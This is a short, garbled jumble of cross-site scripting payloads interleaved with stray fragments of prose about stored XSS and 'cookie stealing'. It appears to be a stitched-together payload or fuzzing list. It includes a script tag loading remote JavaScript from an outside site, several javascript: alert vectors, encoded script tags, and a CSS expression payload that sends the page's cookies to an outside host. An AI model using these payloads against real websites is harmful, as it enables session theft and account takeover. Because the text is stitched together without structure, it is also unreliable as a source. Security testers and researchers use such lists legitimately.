`"'> Actions: phishing through iframe, cookie stealing, always try to convert self to reflected. <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT> , <IMG SRC="javascript:alert('XSS')" <A HREF="//www.google.com/">XSS</A> & test [endif]--> The information in this article is not new. XXX test <DIV STYLE="background-image: url(javascript:alert('XSS'))"> But it is also possible for the server to store the attacker-supplied input (the XSS payload) and serve it to the victim at a later time. javascript:alert(1); "`'> test "`'> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>